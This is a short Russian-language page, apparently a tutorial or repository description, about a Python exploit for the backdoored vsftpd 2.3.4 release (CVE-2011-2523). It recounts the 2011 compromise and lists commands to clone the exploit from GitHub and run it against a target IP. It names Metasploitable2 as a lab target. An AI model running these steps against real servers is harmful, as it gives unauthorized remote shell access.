
Эксплойт на Python для vsftpd 2.3.4 - выполнение команд через бэкдор
Very Secure FTP Daemon (vsftpd) — это FTP-сервер для Unix-подобных платформ, включая Linux. Он распространяется на условиях лицензии GNU General Public Licence. Он поддерживает IPv6, а также SSL.
В июле 2011 года было обнаружено, что версия vsftpd 2.3.4, которую можно было загрузить с основного сайта, была скомпрометирована. Пользователи, входящие на взломанный сервер vsftpd-2.3.4, могут получить командную оболочку на порту 6200, введя :) смайлик в качестве имени пользователя. Это не было ошибкой безопасности в vsftpd; скорее, кто-то загрузил отдельную версию vsftpd с бэкдором. С тех пор сайт был перенесен на Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP

Вы можете протестировать эксплойт на Metasploitable2